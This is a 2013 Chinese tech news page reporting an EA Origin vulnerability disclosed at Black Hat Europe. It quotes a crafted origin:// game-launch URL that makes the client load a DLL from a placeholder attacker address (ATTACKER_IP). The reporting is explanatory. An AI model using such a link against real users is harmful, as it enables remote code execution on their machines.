网络购物安全支付支招 安全总结3.25

PChome | 编辑: 周黎俊 2013-03-25 00:00:00原创 一键看全文

网络购物安全支付支招

EA漏洞

在Black Hat Europe大会上,安全研究人员发现了一个影响4千万Origin玩家的漏洞,该漏洞允许攻击者在玩家电脑上远程执行恶意代码。 问题与EA Origin在玩家电脑上启动游戏的统一资源标识符有关。研究人员演示了如何控制一台安装 Crysis 3和Origin客户端的电脑:

EA 平台漏洞

通常Origin是使用origin://LaunchGame/71503链接启动游戏,但如果目标用户点击了链接 origin://LaunchGame/71503?CommandParams= -openautomate ATTACKER_IPevil.dll,Origin将会载入攻击者选择的Windows动态链接库文件。这个漏洞与去年发现的Steam漏洞相似(也是与Steam:// URL有关)。

提示:试试键盘 “← →” 可以实现快速翻页 

总共 2 页12
一键看全文

本文导航

相关阅读

每日精选

点击查看更多

首页 手机 数码相机 笔记本 游戏 DIY硬件 硬件外设 办公中心 数字家电 平板电脑